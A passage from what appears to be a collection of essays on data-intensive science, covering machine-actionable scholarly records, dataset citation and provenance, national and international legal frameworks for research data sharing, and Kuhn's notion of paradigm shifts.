Before too long, some archetypal problem might emerge in the physical sciences7 that formerly required many weeks of complex query traversals of databases, manually maintained browser tabs, impromptu data analysis scripts, and all the rest of the things we do on a daily basis. For example, a future researcher with seamless semantic access to a federation of databases, including band structure properties and calculations, nuclear magnetic resonance (NMR) and X-ray scattering measurements, and mechanical and other properties, might instantly find a small modification to a recently fabricated material to make it the most efficient photovoltaic ever conceived. Possibilities for such progress in finding new sources of energy or forestalling long-term climate change may already be going unnoticed in today's unintegrated text/database world. If classes of such problems emerge and an immediate solution can be found via automated tools acting directly on a semantic layer that provides the communication channels between open text and databases, then other research communities will be bootstrapped into the future, benefiting from the new possibilities for community-driven scientific knowledge curation and creation embodied in the Fourth Paradigm.

7 As emphasized to me by John Wilbanks in a discussion on May 1, 2009.

References

[1] P. Ginsparg, "Next-Generation Implications of Open Access," accessed Aug. 2007.
[2] D. Shotton, K. Portwin, G. Klyne, and A. Miles, "Adventures in Semantic Publishing: Exemplar Semantic Enhancements of a Research Article," PLoS Comput. Biol., vol. 5, no. 4, p. e1000361, 2009, doi: 10.1371/journal.pcbi.1000361.
[3] P. Bourne, "Will a Biological Database Be Different from a Biological Journal?" PLoS Comput. Biol., vol. 1, no. 3, p. e34, 2005, doi: 10.1371/journal.pcbi.0010034. This article was intentionally provocative.
[4] C. Anderson, "The End of Theory: The Data Deluge Makes the Scientific Method Obsolete," Wired, June 2008. This article was also intentionally provocative.

Herbert Van de Sompel, Los Alamos National Laboratory
Carl Lagoze, Cornell University

…conference presentations and eventually fully articulated in a 2004 paper [1], is still by and large true. Although scholarly publishers have adopted new technologies that have made access to scholarly materials significantly easier (such as the Web and PDF documents), these changes have not realized the full potential of the new digital and networked reality. In particular, they do not address three shortcomings of the prevailing scholarly communication system:

- Systemic issues, particularly the unbreakable tie in the publication system between the act of making a scholarly claim and the peer-review process
- Economic strains that are manifested in the serials crisis, which places tremendous burdens on libraries
- Technical aspects that present barriers to an interoperable information infrastructure

We share these concerns about the state of scholarly communication with many others worldwide. Almost a decade ago, we collaborated with members of that global community to begin the Open Archives Initiative (OAI), which had a significant impact on the direction and pace of the Open Access movement.
The OAI Protocol for Metadata Harvesting (OAI-PMH) and the concurrent OpenURL effort reflected our initial focus on the process-related aspects of scholarly communication. Other members of the community focused on the scholarly content itself. For example, Peter Murray-Rust addressed the flattening of structured, machine-actionable information (such as tabular data and data points underlying graphs) into plain text suited only for human consumption [2]. A decade after our initial work in this area, we are delighted to observe the rapid changes that are occurring in various dimensions of scholarly communication. We will touch upon three areas of change that we feel are significant enough to indicate a fundamental shift.

Augmenting the Scholarly Record with a Machine-actionable Substrate

One motivation for machine readability is the flood of literature that makes it impossible for researchers to keep up with relevant scholarship [3]. Agents that read and filter on scholars' behalf can offer a solution to this problem. The need for such a mechanism is heightened by the fact that researchers increasingly need to absorb and process literature across disciplines, connecting the dots and combining existing disparate findings to arrive at new insights. This is a major issue in life sciences fields that are characterized by many interconnected disciplines (such as genetics, molecular biology, biochemistry, pharmaceutical chemistry, and organic chemistry). For example, the lack of uniformly structured data across related biomedical domains is cited as a significant barrier to translational research, the transfer of discoveries in basic biological and medical research to application in patient care at the clinical level [4].

Recently, we have witnessed a significant push toward a machine-actionable representation of the knowledge embedded in the life sciences literature, which supports reasoning across disciplinary boundaries. Advanced text analysis techniques are being used to extract entities and entity relations from the existing literature, and shared ontologies have been introduced to achieve uniform knowledge representation. This approach has already led to new discoveries based on information embedded in literature that was previously readable only by humans. Other disciplines have engaged in similar activities, and some initiatives are allowing scholars to start publishing entity and entity-relation information at the time of an article's publication, to avoid the post-processing that is current practice [5].

The launch of the international Concept Web Alliance, whose aim is to provide a global interdisciplinary platform to discuss, design, and potentially certify solutions for the interoperability and usability of massive, dispersed, and complex data, indicates that the trend toward a machine-actionable substrate is being taken seriously by both academia and the scholarly information industry. The establishment of a machine-actionable representation of scholarly knowledge can help scholars and learners deal with information abundance. It can allow for new discoveries to be made by reasoning over a body of established knowledge, and it can increase the speed of discovery by helping scholars to avoid redundant research and by revealing promising avenues for new research.
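A trivial illustration of "reasoning over a body of established knowledge" is chaining two independently extracted assertions to surface a connection that no single paper states. The sketch below is hypothetical: the compound, gene, and disease identifiers and the two relation names are invented, and a real system would work over curated ontologies rather than string labels.

    # Illustrative only: chaining two extracted assertions to propose a new,
    # machine-generated lead. All identifiers and relation names are invented.
    assertions = {
        ("compound:X", "inhibits", "gene:ABC1"),
        ("gene:ABC1", "implicated_in", "disease:Y"),
        ("compound:Z", "inhibits", "gene:DEF2"),
    }

    def candidate_leads(facts):
        """If a compound inhibits a gene and that gene is implicated in a disease,
        flag the compound as worth investigating for that disease."""
        inhibits = {(s, o) for (s, p, o) in facts if p == "inhibits"}
        implicated = dict((s, o) for (s, p, o) in facts if p == "implicated_in")
        return {(compound, implicated[gene])
                for (compound, gene) in inhibits if gene in implicated}

    print(candidate_leads(assertions))  # {('compound:X', 'disease:Y')}

Even this toy chain shows why uniform knowledge representation matters: the inference only works because both assertions use the same identifier for the gene.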
Integration of Datasets into the Scholarly Record

Even though data have always been a crucial ingredient in scientific explorations, until recently they were not treated as first-class objects in scholarly communication, as were the research papers that reported on findings extracted from the data. This is rapidly and fundamentally changing. The scientific community is actively discussing and exploring implementation of all core functions of scholarly communication (registration, certification, awareness, archiving, and rewarding [1]) for datasets. For example, the Data Pyramid proposed in [6] clearly indicates how attention to trust (certification) and digital preservation (archiving) for datasets becomes vital as their application reaches beyond personal use and into the realms of disciplinary communities and society at large. The international efforts aimed at enabling the sharing of research data [7] reflect recognition of the need for an infrastructure to facilitate discovery of shared datasets (awareness). And efforts aimed at defining a standard citation format for datasets [8] take for granted that they are primary scholarly artifacts. These efforts are motivated in part by the belief that researchers should gain credit (be rewarded) for the datasets they have compiled and shared. Less than a decade or so ago, these functions of scholarly communication largely applied only to the scholarly literature.

Exposure of Process and Its Integration into the Scholarly Record

Certain aspects of the scholarly communication process have been exposed for a long time. Citations made in publications indicate the use of prior knowledge to generate new insights. In this manner, the scholarly citation graph reveals aspects of scholarly dynamics and is thus actively used as a research focus to detect connections between disciplines and for trend analysis and prediction. However, interpretation of the scholarly citation graph is often error prone due to imperfect manual or automatic citation extraction approaches and challenging author disambiguation issues. The coverage of citation graph data is also partial (top-ranked journals only or specific disciplines only), and unfortunately the most representative graph (Thomson Reuters) is proprietary.

The citation graph problem is indicative of a broader problem: there is no unambiguous, recorded, and visible trace of the evolution of a scholarly asset through the system, nor is there information about the nature of the evolution. The problem is that relationships, which are known at the moment a scholarly asset goes through a step in a value chain, are lost the moment immediately after, in many cases forever. The actual dynamics of scholarship (the interaction/connection between assets, authors, readers, quality assessments about assets, scholarly research areas, and so on) are extremely hard to recover after the fact. Therefore, it is necessary to establish a layer underlying scholarly communication, a grid for scholarly communication that records and exposes such dynamics, relationships, and interactions. A solution to this problem is emerging through a number of innovative initiatives that make it possible to publish information about the scholarly process in machine-readable form to the Web, preferably at the moment that events of the above-described type happen and hence, when all required information is available.
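The sketch below shows what publishing one such scholarly-process event in machine-readable form might look like at the moment the event occurs. The field names form a hypothetical schema chosen purely for illustration; they are not taken from any of the initiatives discussed here.

    import json
    from datetime import datetime, timezone

    # Illustrative only: a scholarly-process event captured at the moment it
    # happens. The field names are a hypothetical schema, not a standard.
    event = {
        "event_type": "dataset_cited",
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "agent": "https://example.org/researcher/0000-0001-2345-6789",
        "source_artifact": "https://example.org/article/42",
        "target_artifact": "https://example.org/dataset/genome-build-7",
        "relationship": "cites",
    }
    print(json.dumps(event, indent=2))

Captured this way, at the time of the event and with unambiguous identifiers for the actors and artifacts involved, such records could later be aggregated into the kinds of citation and usage graphs discussed next.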
Specific to the citation graph case, the Web-oriented citation approach explored by the CLADDIER project demonstrates a mechanism for encoding an accurate, crawlable citation graph on the Web. Several initiatives are aimed at introducing author identifiers [9] that could help establish a less ambiguous citation graph. A graph augmented with citation semantics, such as that proposed by the Citation Typing Ontology effort, would also reveal why an artifact is being cited, an important bit of information that has remained elusive until now [10]. Moving beyond citation data, other efforts to expose the scholarly process include projects that aim to share scholarly usage data (the process of paying attention to scholarly information), such as COUNTER, MESUR, and the bX scholarly recommender service. Collectively, these projects illustrate the broad applicability of this type of process-related information for the purpose of collection development, computation of novel metrics to assess the impact of scholarly artifacts [11], analysis of current research trends [12], and recommender systems. As a result of this work, several projects in Europe are pursuing technical solutions for sharing detailed usage data on the Web.

Another example of process capture is the successful myExperiment effort, which provides a social portal for sharing computational workflow descriptions. Similar efforts in the chemistry community allow the publication and sharing of laboratory notebook information on the Web [13]. We find these efforts particularly inspiring because they allow us to imagine a next logical step, which would be the sharing of provenance data. Provenance data reveal the history of inputs and processing steps involved in the execution of workflows and are a critical aspect of scientific information, both to establish trust in the veracity of the data and to support the reproducibility demanded of all experimental science. Recent work in the computer science community [14] has yielded systems capable of maintaining detailed provenance information within a single environment. We feel that provenance information that describes and interlinks workflows, datasets, and processes is a new kind of process-type metadata that has a key role in network-based and data-intensive science, similar in importance to descriptive metadata, citation data, and usage data in article-based scholarship. Hence, it seems logical that eventually provenance information will be exposed so it can be leveraged by a variety of tools for discovery, analysis, and impact assessment of some core products of new scholarship: workflows, datasets, and processes.

Looking Forward

As described above, the scholarly record will emerge as the result of the intertwining of traditional and new scholarly artifacts, the development of a machine-actionable scholarly knowledge substrate, and the exposure of meta-information about the scholarly process. These facilities will achieve their full potential only if they are grounded in an appropriate and interoperable cyberinfrastructure that is based on the Web and its associated standards. The Web will not only contribute to the sustainability of the scholarly process, but it will also integrate scholarly debate seamlessly with the broader human debate that takes place on the Web. We have recently seen an increased Web orientation in the development of approaches to scholarly interoperability.
This includes the exploration or active use of uniform resource identifiers (URIs), more specifically HTTP URIs, for the identification of scholarly artifacts, concepts, researchers, and institutions, as well as the use of the XML, RDF, RDFS, OWL, RSS, and Atom formats to support the representation and communication of scholarly information and knowledge. These foundational technologies are increasingly being augmented with community-specific and community-driven yet compliant specializations. Overall, a picture is beginning to emerge in which all constituents of the new scholarly record (both human- and machine-readable) are published on the Web, in a manner that complies with general Web standards and community-specific specializations of those standards. Once published on the Web, they can be accessed, gathered, and mined by both human and machine agents.

Our own work on the OAI Object Reuse & Exchange (OAI-ORE) specifications [15], which define an approach to identifying and describing eScience assets that are aggregations of multiple resources, is an illustration of this emerging Web-centric cyberinfrastructure approach. It builds on core Web technologies and also adheres to the guidelines of the Linked Data effort, which is rapidly emerging as the most widespread manifestation of years of Semantic Web work. When describing this trend toward the use of common Web approaches for scholarly purposes, we are reminded of Jim Gray, who insisted throughout the preliminary discussions leading to the OAI-ORE work that any solution should leverage common feed technologies: RSS or Atom. Jim was right in indicating that many special-purpose components of the cyberinfrastructure need to be developed to meet the requirements of scholarly communication, and in recognizing that others are readily available as a result of general Web standardization activities.

As we look into the short-term future, we are reminded of one of Jim Gray's well-known quotes: "May all your problems be technical." With this ironic comment, Jim was indicating that behind even the most difficult technical problems lies an even more fundamental problem: assuring the integration of the cyberinfrastructure into human workflows and practices. Without such integration, even the best cyberinfrastructure will fail to gain widespread use. Fortunately, there are indications that we have learned this lesson from experience through the years with other large-scale infrastructure projects such as the Digital Libraries Initiatives. The Sustainable Digital Data Preservation and Access Network Partners (DataNet) program funded by the Office of Cyberinfrastructure at the U.S. National Science Foundation (NSF) has recently awarded funding for two 10-year projects that focus on cyberinfrastructure as a sociotechnical problem, one that requires both knowledge of technology and understanding of how the technology integrates into the communities of use. We believe that this wider focus will be one of the most important factors in changing the nature of scholarship and the ways that it is communicated over the coming decade. We are confident that the combination of the continued evolution of the Web, new technologies that leverage its core principles, and an understanding of the way people use technology will serve as the foundation of a fundamentally rethought scholarly communication system that will be friendly to both humans and machines.
With the emergence of that system, we will happily refrain from using our once-beloved scanned copy metaphor.

References

[1] H. Van de Sompel, S. Payette, J. Erickson, C. Lagoze, and S. Warner, "Rethinking Scholarly Communication: Building the System that Scholars Deserve," D-Lib Mag., vol. 10, no. 9, 2004.
[2] P. Murray-Rust and H. S. Rzepa, "The Next Big Thing: From Hypermedia to Datuments," J. Digit. Inf., vol. 5, no. 1, 2004.
[3] C. L. Palmer, M. H. Cragin, and T. P. Hogan, "Weak information work in scientific discovery," Inf. Process. Manage., vol. 43, no. 3, pp. 808-820, 2007, doi: 10.1016/j.ipm.2006.06.003.
[4] A. Ruttenberg, T. Clark, W. Bug, M. Samwald, O. Bodenreider, H. Chen, D. Doherty, K. Forsberg, Y. Gao, V. Kashyap, J. Kinoshita, J. Luciano, M. S. Marshall, C. Ogbuji, J. Rees, S. Stephens, G. T. Wong, E. Wu, D. Zaccagnini, T. Hongsermeier, E. Neumann, I. Herman, and K. H. Cheung, "Advancing translational research with the Semantic Web," BMC Bioinf., vol. 8, suppl. 3, p. S2, 2007, doi: 10.1186/1471-2105-8-S3-S2.
[5] D. Shotton, K. Portwin, G. Klyne, and A. Miles, "Adventures in Semantic Publishing: Exemplar Semantic Enhancements of a Research Article," PLoS Comput. Biol., vol. 5, no. 4, p. e1000361, 2009, doi: 10.1371/journal.pcbi.1000361.
[6] F. Berman, "Got data?: a guide to data preservation in the information age," Commun. ACM, vol. 51, no. 12, pp. 50-56, 2008, doi: 10.1145/1409360.1409376.
[7] R. Ruusalepp, Infrastructure Planning and Data Curation: A Comparative Study of International Approaches to Enabling the Sharing of Research Data, JISC, Nov. 30, 2008.
[8] M. Altman and G. King, "A Proposed Standard for the Scholarly Citation of Quantitative Data," D-Lib Magazine, vol. 13, no. 3/4, 2007.
[9] M. Enserink, "Science Publishing: Are You Ready to Become a Number?" Science, vol. 323, no. 5922, 2009, doi: 10.1126/science.323.5922.1662.
[10] N. Kaplan, "The norm of citation behavior," Am. Documentation, vol. 16, pp. 179-184, 1965.
[11] J. Bollen, H. Van de Sompel, A. Hagberg, and R. Chute, "A Principal Component Analysis of 39 Scientific Impact Measures," PLoS ONE, vol. 4, no. 6, p. e6022, 2009, doi: 10.1371/journal.pone.0006022.
[12] J. Bollen, H. Van de Sompel, A. Hagberg, L. Bettencourt, R. Chute, and L. Balakireva, "Clickstream Data Yields High-Resolution Maps of Science," PLoS ONE, vol. 4, no. 3, p. e4803, 2009, doi: 10.1371/journal.pone.0004803.
[13] S. J. Coles, J. G. Frey, M. B. Hursthouse, M. E. Light, A. J. Milsted, L. A. Carr, D. De Roure, C. J. Gutteridge, H. R. Mills, K. E. Meacham, M. Surridge, E. Lyon, R. Heery, M. Duke, and M. Day, "An e-science environment for service crystallography from submission to dissemination," J. Chem. Inf. Model., vol. 46, no. 3, 2006, doi: 10.1021/ci050362w.
[14] R. Bose and J. Frew, "Lineage retrieval for scientific data processing: a survey," ACM Comput. Surv. (CSUR), vol. 37, no. 1, pp. 1-28, 2005, doi: 10.1145/1057977.1057978.
[15] H. Van de Sompel, C. Lagoze, C. E. Nelson, S. Warner, R. Sanderson, and P. Johnston, "Adding eScience Publications to the Data Web," Proc. Linked Data on the Web 2009, Madrid.

Anne Fitzgerald, Brian Fitzgerald, Kylie Pappalardo
Queensland University of Technology

Advances in information and communication technologies have brought about an information revolution, leading to fundamental changes in the way that information is collected or generated, shared, and distributed [1, 2].
The importance of establishing systems in which research findings can be readily made available to and used by other researchers has long been recognized in international scientific collaborations. Acknowledgment of the need for data access and sharing is most evident in the framework documents underpinning many of the large-scale observational projects that generate vast amounts of data about the Earth, water, the marine environment, and the atmosphere. For more than 50 years, the foundational documents of major collaborative scientific projects have typically included as a key principle a commitment to ensuring that research outputs will be openly and freely available. While these agreements are often entered into at the international level (whether between governments or their representatives in international organizations), individual researchers and research projects typically operate locally, within a national jurisdiction. If the data access principles adopted by international scientific collaborations are to be effectively implemented, they must be supported by the national policies and laws in place in the countries in which participating researchers are operating. Failure to establish a bridge between, on the one hand, data access principles enunciated at the international level and, on the other hand, the policies and laws at the national level means that the benefits flowing from data sharing are at risk of being thwarted by domestic objectives [3].

The need for coherence among data sharing principles adopted by international science collaborations and the policy and legal frameworks in place in the national jurisdictions where researchers operate is highlighted by the Global Earth Observation System of Systems (GEOSS) initiated in 2005 by the Group on Earth Observations (GEO) [1, p. 125]. GEOSS seeks to connect the producers of environmental data and decision-support tools with the end users of these products, with the aim of enhancing the relevance of Earth observations to global issues. The end result will be a global public infrastructure that generates comprehensive, near-real-time environmental data, information, and analyses for a wide range of users. The vision for GEOSS is as a system of systems, built on existing observational systems and incorporating new systems for Earth observation and modeling that are offered as GEOSS components. This emerging public infrastructure links a diverse and growing array of instruments and systems for monitoring and forecasting changes in the global environment. This system of systems supports policymakers, resource managers, science researchers, and many other experts and decision makers.

International Policies

One of GEO's earliest actions was to explicitly acknowledge the importance of data sharing in achieving its vision and to agree on a strategic set of data sharing principles for GEOSS [4]:

- There will be full and open exchange of data, metadata, and products shared within GEOSS, recognizing relevant international instruments and national policies and legislation.
- All shared data, metadata, and products will be made available with minimum time delay and at minimum cost.
- All shared data, metadata, and products free of charge or no more than cost of reproduction will be encouraged for research and education.

These principles, though significant, are not strictly new.
A number of other international policy statements promote public availability and open exchange of data, including the Bermuda Principles (1996) and the Berlin Declaration on Open Access to Knowledge in the Sciences and Humanities (2003) [5]. The Bermuda Principles were developed by scientists involved in the International Human Genome Sequencing Consortium and their funding agencies and represented an agreement among researchers about the need to establish a basis for the rapid and open sharing of prepublication data on gene sequences [6]. The Bermuda Principles required automatic release of sequence assemblies larger than 1 kb and immediate publication of finished annotated sequences. They sought to make the entire gene sequence freely available to the public for research and development in order to maximize benefits to society. The Berlin Declaration had the goal of supporting the open access paradigm via the Internet and promoting the Internet as a fundamental instrument for a global scientific knowledge base. It defined "open access contribution" to include scientific research results, raw data, and metadata, and it required open access contributions to be deposited in an online repository and made available under "a free, irrevocable, worldwide, right of access to, and a license to copy, use, distribute, transmit and display the work publicly and to make and distribute derivative works, in any digital medium for any responsible purpose, subject to proper attribution of authorship." [7]

In fact, the GEOSS principles map closely to the data sharing principles espoused in the Antarctic Treaty, signed almost 50 years earlier in Washington, D.C., in 1959, which has received sustained attention in Australia, particularly in relation to marine data research. (Other international treaties with such provisions include the UN Convention on the Law of the Sea, the Ozone Protocol, the Convention on Biodiversity, and the Aarhus Convention.) Article III of the Antarctic Treaty states: "1. In order to promote international cooperation in scientific investigation in Antarctica, as provided for in Article II of the present Treaty, the Contracting Parties agree that, to the greatest extent feasible and practicable: ... (c) scientific observations and results from Antarctica shall be exchanged and made freely available." [8]

The data sharing principles stated in the Antarctic Treaty, the GEOSS 10-Year Implementation Plan, the Bermuda Principles, and the Berlin Declaration, among others, are widely acknowledged to be not only beneficial but crucial to information flows and the availability of data. However, problems arise because, in the absence of a clear policy and legislative framework at the national level, other considerations can operate to frustrate the effective implementation of the data sharing objectives that are central to international science collaborations [5, 9]. Experience has shown that without an unambiguous statement of data access policy and a supporting legislative framework, good intentions are too easily frustrated in practice.

National Frameworks

The key strategy in ensuring that international policies requiring full and open exchange of data are effectively acted on in practice lies in the development of a coherent policy and legal framework at a national level. (See Figure 1.) The national framework must support the international principles for data access and sharing but also be clear and practical enough for researchers to follow at a research project level.
While national frameworks for data sharing are well established in the United States and Europe, this is not the case in many other jurisdictions (including Australia). Kim Finney of the Antarctic Data Centre has drawn attention to the difficulties in implementing Article III(1)(c) of the Antarctic Treaty in the absence of established data access policies in signatories to the treaty. She points out that being able to achieve the goal set out in the treaty requires a genuine willingness on the part of scientists to make their data available to other researchers. This willingness is lacking, despite the treaty's clear intention that Antarctic science data be exchanged and made freely available. Finney argues that there is a strong need for a data access policy in Antarctic member states, because without such a policy, the level of conformance with the aspirations set out in the Antarctic Treaty is patchy at best [10] [1, pp. 77-78].

FIGURE 1. A regulatory framework for data-sharing arrangements, spanning international policies (e.g., the GEOSS data sharing principles, the Antarctic Treaty, the Bermuda Principles), international legal instruments (e.g., OECD Recommendations), national frameworks, and data management plans.

In the U.S., the Office of Management and Budget (OMB) Circular A-130 establishes the data access and reuse policy framework for the executive branch departments and agencies of the U.S. federal government [11] [1, pp. 174-175]. As well as acknowledging that government information is a valuable public resource and that the nation stands to benefit from the dissemination of government information, OMB Circular A-130 requires that improperly restrictive practices be avoided. Additionally, Circular A-16, entitled Coordination of Geographic Information and Related Spatial Data Activities, provides that U.S. federal agencies have a responsibility to "[c]ollect, maintain, disseminate, and preserve spatial information such that the resulting data, information, or products can be readily shared with other federal agencies and non-federal users, and promote data integration between all sources." [12] [1, pp. 181-183]

In Europe, the policy framework consists of the broad-reaching Directive on the Re-use of Public Sector Information (2003) (the PSI Directive) [13], as well as the specific directive establishing an Infrastructure for Spatial Information (2007) (the INSPIRE Directive) [14] and the Directive on Public Access to Environmental Information (2003) [15], which obliges public authorities to provide timely access to environmental information. In negotiating the PSI Directive, the European Parliament and Council of the European Union recognized that the public sector is the largest producer of information in Europe and that substantial social and economic benefits stood to be gained if this information were available for access and reuse. However, European content firms engaging in the aggregation of information resources into value-added information products would be at a competitive disadvantage if they did not have clear policies or uniform practices to guide them in relation to access to and reuse of public sector information. The lack of harmonization of policies and practices regarding public sector information was seen as a barrier to the development of digital products and services based on information obtained from different countries [1, pp. 137-138].
In response, the PSI Directive establishes a framework of rules governing the reuse of existing documents held by the public sector bodies of EU member states. Furthermore, the INSPIRE Directive establishes EU policy and principles relating to spatial data held by or on behalf of public authorities and to the use of spatial data by public authorities in the performance of their public tasks.

Unlike the U.S. and Europe, however, Australia does not currently have a national policy framework addressing access to and use of data. In particular, the current situation with respect to public sector information (PSI) access and reuse is fragmented and lacks a coherent policy foundation, whether viewed in terms of interactions within or among the different levels of government at the local, state/territory, and federal levels or between the government, academic, and private sectors. (There has been little policy advancement in Australia on the matter of access to government information since the Office of Spatial Data Management's Policy on Spatial Data Access and Pricing in 2001.) In 2008, the Venturous Australia report of the Review of the National Innovation System recommended (in Recommendation 7.7) that Australia establish a National Information Strategy to optimize the flow of information in the Australian economy [16]. However, just how a National Information Strategy could be established remains unclear.

A starting point for countries like Australia that have yet to establish national frameworks for the sharing of research outputs has been provided by the Organisation for Economic Co-operation and Development (OECD). At the Seoul Ministerial Meeting on the Future of the Internet Economy in 2008, the OECD Ministers endorsed statements of principle on access to research data produced as a result of public funding and on access to public sector information. These documents establish principles to guide availability of research data, including openness, transparency, legal conformity, interoperability, quality, efficiency, accountability, and sustainability, similar to the principles expressed in the GEOSS statement. The openness principle in the OECD Council's Recommendation on Access to Research Data from Public Funding (2006) states: "A) Openness: Openness means access on equal terms for the international research community at the lowest possible cost, preferably at no more than the marginal cost of dissemination. Open access to research data from public funding should be easy, timely, user-friendly and preferably Internet-based." [17]

OECD Recommendations are OECD legal instruments that describe standards or objectives that OECD member countries (such as Australia) are expected to implement, although they are not legally binding. However, through long-standing practice of member countries, a Recommendation is considered to have great moral force [2, p. 11]. In Australia, the Prime Minister's Science, Engineering and Innovation Council (PMSEIC) Data for Science Working Group, in its 2006 report From Data to Wisdom: Pathways to Successful Data Management for Australian Science, recommended that OECD guidelines be taken into account in the development of a strategic framework for management of research data in Australia [18]. The development of a national framework for data management based on
principles promoting data access and sharing (such as the OECD Recommendation) would help to incorporate international policy statements and protocols such as the Antarctic Treaty and the GEOSS Principles into domestic law. This would provide stronger guidance (if not a requirement) for researchers to consider and, where practicable, incorporate these data sharing principles into their research project data management plans [5, 9].

Conclusion

Establishing data sharing arrangements for complex, international eResearch collaborations requires appropriate national policy and legal frameworks and data management practices. While international science collaborations typically express a commitment to data access and sharing, in the absence of a supporting national policy and legal framework and good data management practices, such objectives are at risk of not being implemented. Many complications are inherent in eResearch science collaborations, particularly where they involve researchers operating in distributed locations. Technology has rendered physical boundaries irrelevant, but legal jurisdictional boundaries remain. If research data is to flow as intended, it will be necessary to ensure that national policies and laws support the data access systems that have long been regarded as central to international science collaborations. In developing policies, laws, and practices at the national level, guidance can be found in the OECD's statements on access to publicly funded research data, the U.S. OMB's Circular A-130, and various EU directives. It is crucial that countries take responsibility for promoting policy goals for access and reuse of data at all three levels in order to facilitate information flows. It is only by having the proper frameworks in place that we can be sure to keep afloat in the data deluge.

References
[1] A. Fitzgerald, A review of the literature on the legal aspects of open access policy, practices and licensing in Australia and selected jurisdictions, Cooperative Research Centre for Spatial Information and Queensland University of Technology, July 2009.
[2] Submission of the Intellectual Property: Knowledge, Culture and Economy (IP: KCE) Research Program, Queensland University of Technology, to the Digital Economy Future Directions paper, Australian Government, prepared by B. Fitzgerald, A. Fitzgerald, J. Coates, and K. Pappalardo, Mar. 4, 2009, p. 2, University_of_Technology_QUT_Law_Faculty.pdf.
[3] B. Fitzgerald, Ed., Legal Framework for e-Research: Realising the Potential. Sydney University Press, 2008.
[4] Group on Earth Observations (GEO), GEOSS 10-Year Implementation Plan, adopted Feb. 16, 2005, p. 4.
[5] A. Fitzgerald and K. Pappalardo, Building the Infrastructure for Data Access and Reuse in Collaborative Research: An Analysis of the Legal Context, OAK Law Project and Legal Framework for e-Research Project, 2007.
[6] Bermuda Principles, 1996, accessed on June 10, 2009.
[7] Berlin Declaration on Open Access to Knowledge in the Sciences and Humanities (2003), accessed on June 10, 2009.
[8] The Antarctic Treaty (1959), signed in Washington, D.C., Dec. 1, 1959; entry into force for Australia and generally: June 23, 1961, [1961] ATS 12 (Australian Treaty Series, 1961, no. 12), accessed June 5, 2009.
[9] A. Fitzgerald, K. Pappalardo, and A. Austin, Practical Data Management: A Legal and Policy Guide, OAK Law Project and Legal Framework for e-Research Project, 2008.
[10] Scientific Committee on Antarctic Research (SCAR) Data and Information Strategy 2008-2013, Joint Committee on Antarctic Data Management (JCADM) and Standing Committee on Antarctic Geographic Information (SC-AGI), authored by K. Finney, Australian Antarctic Data Centre, Australian Antarctic Division (revised May 2008), p. 40, filesystem/jcadm_group/Strategy/SCAR_DIM_StrategyV2-CSKf_final.pdf.
[11] Office of Management and Budget Circular A-130 on Management of Federal Information Resources (OMB Circular A-130), 2000.
[12] Office of Management and Budget Circular A-16 on the Coordination of Geographic Information and Related Spatial Data Activities (OMB Circular A-16), issued Jan. 16, 1953, revised 1967, 1990, 2002, Sec. 8.
[13] European Parliament and Council of the European Union, Directive 2003/98/EC of the European Parliament and of the Council of 17 November 2003 on the re-use of public sector information, 2003, OJ L 345/90, 32003L0098:EN:HTML.
[14] European Parliament and Council of the European Union, Directive 2007/2/EC of the European Parliament and of the Council of 14 March 2007 establishing an infrastructure for spatial information, OJ L 108/1, Apr. 25, 2007, OJ:L:2007:108:0001:01:EN:HTML.
[15] European Parliament and Council of the European Union, Directive 2003/4/EC of the European Parliament and of the Council of 28 January 2003 on public access to environmental information and repealing Council Directive 90/313/EEC, OJ L 041, Feb. 14, 2003, pp. 0026-0032.
[16] Cutler & Company, Venturous Australia: Building Strength in Innovation, Review of the National Innovation System, p. 95, 2008.
[17] OECD, Recommendation of the Council concerning Access to Research Data from Public Funding, C(2006)184, Dec. 14, 2006, A5FB1397B5ADFB7C12572980053C9D3?OpenDocument, accessed on June 5, 2009. Note that these have also been published in OECD Principles and Guidelines for Access to Research Data from Public Funding, 2007.
[18] Prime Minister's Science, Engineering and Innovation Council (PMSEIC) Working Group on Data for Science, From Data to Wisdom: Pathways to Successful Data Management for Australian Science, Recommendation 9, p. 12, Dec. 2006, innovation/publications_resources/profiles/Presentation_Data_for_Science.htm.

I tend to get nervous when I hear talk of paradigm shifts. The term itself has been debased through inaccurate popular use - even turning into a joke on The Simpsons - but its original role in Thomas Kuhn's Structure of Scientific Revolutions [1] is worth revisiting as we examine the idea of a Fourth Paradigm and its impact on scholarly communication [2]. Kuhn's model describes a world of science in which a set of ideas becomes dominant and entrenched, creating a worldview (the infamous "paradigm") that itself gains strength and power. This set of ideas becomes powerful because it represents a plausible explanation for observed phenomena. Thus we get the luminiferous aether, the miasma theory of infectious disease, and the idea that the sun revolves around the Earth. The set of ideas, the worldview, the paradigm, gains strength through incrementalism. Each individual scientist tends to work in a manner that adds, bit by bit, to the paradigm. The individual who can make a big addition to the worldview gains authority, research contracts, awards and prizes, and seats on boards of directors. All involved gain an investment in the set of ideas that goes beyond the ideas themselves.
Industries and governments (and the people who work in them) build businesses and policies that depend on the worldview. This adds a layer of defense - an immune system of sorts - that protects the worldview against attack. Naysayers are marginalized. New ideas lie fallow, unfunded, and unstaffed. Fear, uncertainty, and doubt color perceptions of new ideas, methods, models, and approaches that challenge the established paradigm. Yet worldviews fall and paradigms shatter when they stop explaining the observed phenomena or when an experiment conclusively proves the paradigm wrong. The aether was conclusively disproven after hundreds of years of incrementalism. As was miasma, as was geocentrism. The time for a shift comes when the old ways of explaining things simply can no longer match the new realities.

This strikes me as being the idea behind Jim Gray's argument about the fourth data paradigm [3] and the framing of the data deluge - that our capacity to measure, store, analyze, and visualize data is the new reality to which science must adapt. Data is at the heart of this new paradigm, and it sits alongside empiricism, theory, and simulation, which together form the continuum we think of as the modern scientific method. But I come to celebrate the first three paradigms, not to bury them. Empiricism and theory got us a long way, from a view of the world that had the sun revolving around the Earth to quantum physics. Simulation is at the core of so much contemporary science, from anthropological re-creations of ancient Rome to weather prediction. The accuracy of simulations and predictions represents the white-hot center of policy debates about economics and climate change. And it's vital to note that empiricism and theory are essential to a good simulation. I can encode a lovely simulation on my screen in which there is no theory of gravity, but if I attempt to drive my car off a cliff, empiricism is going to bite my backside on the way down.

